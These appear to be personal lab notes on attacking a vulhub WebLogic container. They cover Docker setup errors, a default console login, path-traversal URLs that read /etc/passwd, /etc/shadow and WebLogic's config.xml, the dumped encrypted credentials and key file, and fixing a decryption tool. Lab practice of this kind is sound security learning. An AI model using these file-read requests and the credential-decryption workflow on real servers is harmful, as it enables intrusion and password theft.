cd /var/local/software
/var/local/soft/vulhub-master
-
- 解决报错
/var/local/soft/vulhub-master
✔ weblogic 17 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿] 0B/0B Pulled 294.9s
✔ 6599cadaf950 Pull complete 10.3s
✔ 23eda618d451 Pull complete 2.3s
✔ f0be3084efe9 Pull complete 1.9s
✔ 52de432f084b Pull complete 3.7s
✔ a3ed95caeb02 Pull complete 4.0s
✔ a2318f26c625 Pull complete 11.7s
✔ 1aa642dd8cc1 Pull complete 7.5s
✔ b307208f8bf5 Pull complete 20.3s
✔ 1dfbbdcc497d Pull complete 12.8s
✔ a53e674a7606 Pull complete 35.8s
✔ 5f06bb51fa3c Pull complete 31.3s
✔ ff0ff72567f2 Pull complete 189.5s
✔ 684862046025 Pull complete 34.0s
✔ abbf8d475455 Pull complete 252.3s
✔ 848eb11ef744 Pull complete 37.6s
✔ 2f3438f2b83b Pull complete 42.1s
✔ 8e5871e15571 Pull complete 47.2s
[+] Building 0.0s (0/0) docker:default
[+] Running 1/1
✘ Network weak_password_default Error 0.2s
failed to create network weak_password_default: Error response from daemon: Failed to program FILTER chain: iptables failed: iptables --wait -I FORWARD -o br-dee114e10024 -j DOCKER: iptables v1.4.21: Couldn't load target `DOCKER':No such file or directory
Try `iptables -h' or 'iptables --help' for more information.
(exit status 2)
- pkill docker
- iptables -t nat -F
- ifconfig docker0 down
- brctl delbr docker0
- docker -d
- systmctl restart docker
systemctl restart docker
192.168.23.154:7001
http://192.168.23.154:7001/console
username weblogic
password Oracle@123
http://192.168.23.154:7001/hello/file.jsp?path=/etc/passwd
http://192.168.23.154:7001/hello/file.jsp?path=/etc/shadow
密文绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径:security/SerializedSystemIni.dat
密钥绝对路径:
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml ,相对路径:config/config.xml
密文
0d0a 0d0a 04d9 d0e2 e802 2087 50b0 fa9b
9552 23f4 82ec fe8d 5697 e422 4f1d 9ca1
0081 53fc 1da3 895a 4250 6818 3186 b88a
af82 723d 28a8 220f 9f28 7338 d8c5 f9af
3651 c7e7
密钥
http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">
<name>base_domain</name>
<domain-version>10.3.6.0</domain-version>
<security-configuration>
<name>base_domain</name>
<realm>
<sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>
<sec:authentication-provider xsi:type="wls:default-identity-asserterType">
<sec:active-type>AuthenticatedUser</sec:active-type>
</sec:authentication-provider>
<sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>
<sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>
<sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>
<sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>
<sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>
<sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
<sec:name>myrealm</sec:name>
<sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
<sec:name>SystemPasswordValidator</sec:name>
<pas:min-password-length>8</pas:min-password-length>
<pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
</sec:password-validator>
</realm>
<default-realm>myrealm</default-realm>
<credential-encrypted>{AES}VDHLmpIFsxhe5+CetHjC3Du768mgXgEeInws2SytpnqhqgWkdGFks2BYtSJzE3FrrjdLjKS9w24Krv0Ong11Bogvc8rPC6HC3eqZy8X5U8/jhzgwct+ZTRgagnYCb4zy</credential-encrypted>
<node-manager-username>weblogic</node-manager-username>
<node-manager-password-encrypted>{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=</node-manager-password-encrypted>
</security-configuration>
<server>
<name>AdminServer</name>
<listen-address></listen-address>
</server>
<embedded-ldap>
<name>base_domain</name>
<credential-encrypted>{AES}uikbk+R+r6Vqv3OiFGQ4XnxJAHEnqFuni3K+SlgZxAsWEyIvLEi+O2omKTsWD9GW</credential-encrypted>
</embedded-ldap>
<configuration-version>10.3.6.0</configuration-version>
<app-deployment>
<name>_appsdir_hello_war</name>
<target>AdminServer</target>
<module-type>war</module-type>
<source-path>autodeploy/hello.war</source-path>
<security-dd-model>DDOnly</security-dd-model>
<staging-mode>stage</staging-mode>
</app-deployment>
<admin-server-name>AdminServer</admin-server-name>
</domain>
λ java -jar D:\800016PenetrationTesting\023中间件漏洞\Weblogic漏洞资料\weblogic_decrypt.jar
Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: org/bouncycastle/jce/provider/BouncyCastleProvider
at DecryptorView.makeButtonActionPerformed(DecryptorView.java:244)
at DecryptorView.access$200(DecryptorView.java:17)
at DecryptorView$3.actionPerformed(DecryptorView.java:100)
at java.desktop/javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1972)
at java.desktop/javax.swing.AbstractButton$Handler.actionPerformed(AbstractButton.java:2313)
at java.desktop/javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:405)
at java.desktop/javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:262)
at java.desktop/javax.swing.plaf.basic.BasicButtonListener.mouseReleased(BasicButtonListener.java:279)
at java.desktop/java.awt.Component.processMouseEvent(Component.java:6626)
at java.desktop/javax.swing.JComponent.processMouseEvent(JComponent.java:3389)
at java.desktop/java.awt.Component.processEvent(Component.java:6391)
at java.desktop/java.awt.Container.processEvent(Container.java:2266)
at java.desktop/java.awt.Component.dispatchEventImpl(Component.java:5001)
at java.desktop/java.awt.Container.dispatchEventImpl(Container.java:2324)
at java.desktop/java.awt.Component.dispatchEvent(Component.java:4833)
at java.desktop/java.awt.LightweightDispatcher.retargetMouseEvent(Container.java:4948)
at java.desktop/java.awt.LightweightDispatcher.processMouseEvent(Container.java:4575)
1.下载bcprov-jdkxx-xxx.jar
2.将bcprov-jdkxx-xxx.jar放入$JAVA_HOME/jre/lib/ext下
3.打开$JAVA_HOME/jre/lib/security下的java.security文件,在末尾加上
security.provider.x=org.bouncycastle.jce.provider.BouncyCastleProvider